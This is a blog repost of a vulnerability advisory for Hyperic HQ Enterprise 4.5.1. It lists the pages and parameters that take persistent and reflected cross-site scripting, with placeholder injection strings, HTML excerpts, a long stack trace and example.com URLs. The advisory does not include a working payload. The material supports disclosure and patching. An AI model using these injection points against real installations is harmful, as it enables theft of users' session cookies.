Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86388093

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/50456/info

Hyperic HQ Enterprise is prone to a cross-site scripting vulnerability and multiple unspecified security vulnerabilities.

An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and steal cookie-based authentication credentials. The impact of other issues is unknown.

These issues affect Hyperic HQ Enterprise 4.5.1; other versions may also be affected. 

Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers or local & low privileged user accounts.
For demonstration or reproduce ...

1.1
Code Review: HQ Roles  [IVE - Persistent]

<td width="30%" class="BlockContent">
<!-- END VIEW MODE --> 
</td></tr><tr valign="top">
<td width="20%" class="BlockLabel">Dashboard Name:</td>
<td width="30%" class="BlockContent">
<span id="dashboardString">New Role Dashboard</span></td>
<td width="20%" class="BlockLabel"></td>
<td width="30%" class="BlockContent"></td></tr></table>
<!--  /  -->


Code Review: java.security.krb5.kdc   Module: HQ Health / HQ Process Information & Diagnostics  [IVE - Persistent]

- java.rmi.server.codebase = http://h1461735:9093/ 
- java.rmi.server.hostname = h1461735 
- java.runtime.name = Java(TM) SE Runtime Environment 
- java.runtime.version = 1.6.0_13-b03 
- java.security.krb5.kdc = >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!> 
- java.security.krb5.realm = >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!> 
- java.specification.name = Java Platform API Specification 
- java.specification.vendor = Sun Microsystems Inc. 
- java.specification.version = 1.6 
- java.vendor = Sun Microsystems Inc. 

.../PoC/printReport(poc).hqu



Code Review: Browse - Monitor - Indikators  [IVE - Persistent]


hyperic.data.escalation.pauseSelect.options[12] = new Option("72 hours", "259200000");
hyperic.data.escalation.pauseSelect.options[13] = new Option("Until Fixed", "9223372036854775807");
</script>
<title>
HQ View Application Monitor Current Health - >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>
</title>
<script type="text/javascript">
var onloads = [];
function initOnloads() {
            if (arguments.callee.done) return;

... or

  hyperic.data.escalation.pauseSelect.options[12] = new Option("72 hours", "259200000");
  hyperic.data.escalation.pauseSelect.options[13] = new Option("Until Fixed", "9223372036854775807");
</script>
  <title>
   >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>
  </title>
    <script type="text/javascript">
        var onloads = [];
         function initOnloads() {
        
            if (arguments.callee.done) return;
            arguments.callee.done = true;
           if(typeof(_timer)!="undefined") clearInterval(_timer);
           for ( var i = 0 ; i < onloads.length ; i++ )
             onloads[i]();



Code Review: Applications � All Applications - Topic  [IVE - Persistent]

<li class="hasSubmenu"><a href="">Recently Viewed</a><div><ul>
<li><a href="/Resource.do?eid=4:10001">"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>;
</a></li></ul></div></li></ul></div></li><li id="analyzeTab"><a href="#">Analyze</a><div><ul>



Code Review: General Properties - Inventory over Exception-Handling [IVE - Persistent]

<div id="exception27" style="visibility:hidden">javax.servlet.jsp.JspTagException: javax.servlet.jsp.JspException: 
An error occurred while evaluating custom action attribute "sort" with value "${param.scs}": An exception occured trying to convert 
String ">"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>" to type "java.lang.Integer"
  at org.hyperic.hq.ui.taglib.display.TableTag.evalAttr(TableTag.java:1456)
  at org.hyperic.hq.ui.taglib.display.TableTag.evalAttr(TableTag.java:1438)
  at org.hyperic.hq.ui.taglib.display.TableTag.evaluateAttributes(TableTag.java:1517)
  at org.hyperic.hq.ui.taglib.display.TableTag.doStartTag(TableTag.java:226)
  at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspx_meth_display_005ftable_005f0(Unknown Source)
  at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspx_meth_html_005fform_005f0(Unknown Source)
  at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspService(Unknown Source)
  at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
  at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)
  at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)
  at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)
  at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)
  at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)
  at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)
  at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)
  at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)
  at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)
  at org.apache.jsp.resource.application.inventory.ViewApplication_jsp._jspx_meth_tiles_005finsert_005f8(Unknown Source)
  at org.apache.jsp.resource.application.inventory.ViewApplication_jsp._jspService(Unknown Source)
  at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
  at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)
  at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)
  at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)
  at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)
  at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)
  at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)
  at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)
  at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)
  at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)
  at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_tiles_005finsert_005f0(Unknown Source)
  at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_c_005fforEach_005f1(Unknown Source)
  at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_c_005fforEach_005f0(Unknown Source)
  at org.apache.jsp.portal.ColumnsLayout_jsp._jspService(Unknown Source)
  at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
  at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)
  at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)
  at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)
  at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)
  at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)
  at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)
  at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)
  at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)
  at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)
  at org.apache.jsp.portal.MainLayout_jsp._jspx_meth_tiles_005finsert_005f2(Unknown Source)
  at org.apache.jsp.portal.MainLayout_jsp._jspService(Unknown Source)
  at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
  at org.apache.catalina.core.ApplicationDispatcher.processRequest(ApplicationDispatcher.java:445)
  at org.apache.catalina.core.ApplicationDispatcher.doForward(ApplicationDispatcher.java:379)
  at org.apache.catalina.core.ApplicationDispatcher.forward(ApplicationDispatcher.java:292)
  at org.apache.struts.action.RequestProcessor.doForward(RequestProcessor.java:1085)
  at org.apache.struts.tiles.TilesRequestProcessor.doForward(TilesRequestProcessor.java:263)
  at org.apache.struts.tiles.TilesRequestProcessor.processTilesDefinition(TilesRequestProcessor.java:239)
  at org.apache.struts.tiles.TilesRequestProcessor.internalModuleRelativeForward(TilesRequestProcessor.java:341)
  at org.apache.struts.action.RequestProcessor.processForward(RequestProcessor.java:572)
  at org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:221)
  at org.apache.struts.action.ActionServlet.process(ActionServlet.java:1196)
  at org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:414)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:690)
  at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.hyperic.hq.ui.AuthenticationFilter.doFilter(AuthenticationFilter.java:167)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.hyperic.hibernate.filter.SessionFilter$1.run(SessionFilter.java:59)
  at org.hyperic.hq.hibernate.SessionManager.runInSessionInternal(SessionManager.java:79)
  at org.hyperic.hq.hibernate.SessionManager.runInSession(SessionManager.java:68)
  at org.hyperic.hibernate.filter.SessionFilter.doFilter(SessionFilter.java:57)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.tuckey.web.filters.urlrewrite.RuleChain.handleRewrite(RuleChain.java:164)
  at org.tuckey.web.filters.urlrewrite.RuleChain.doRules(RuleChain.java:141)
  at org.tuckey.web.filters.urlrewrite.UrlRewriter.processRequest(UrlRewriter.java:90)
  at org.tuckey.web.filters.urlrewrite.UrlRewriteFilter.doFilter(UrlRewriteFilter.java:417)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.hyperic.hq.product.servlet.filter.JMXFilter.doFilter(JMXFilter.java:322)
  at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
  at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
  at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:230)
  at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:175)
  at org.jboss.web.tomcat.security.SecurityAssociationValve.invoke(SecurityAssociationValve.java:182)
  at org.jboss.web.tomcat.security.JaccContextValve.invoke(JaccContextValve.java:84)
  at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127)
  at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)
  at org.jboss.web.tomcat.service.jca.CachedConnectionValve.invoke(CachedConnectionValve.java:157)
  at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:109)
  at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:262)
  at org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:844)
  at org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.process(Http11Protocol.java:583)
  at org.apache.tomcat.util.net.JIoEndpoint$Worker.run(JIoEndpoint.java:446)
  at java.lang.Thread.run(Unknown Source) </div>


1.2
References:
http://www.example.com/admin/role/RoleAdmin.do?mode=new
http://www.example.com/hqu/health/health/printReport.hqu
http://www.example.com/Resource.do?eid=4:10001
http://www.example.com/ResourceHub.do
http://www.example.com/resource/application/Inventory.do?mode=view&accord=3&eid=4:10001&sos=dec&scs=




Code Review: Escalation Schemes Configuration [XSS]

http://www.example.com/admin/config/Config.do?mode=escalate&escId=[INCLUDE CLIENT_SIDE SCRIPTCODE HERE!!!]

References:
http://www.example.com/admin/config/Config.do?mode=escalate&escId=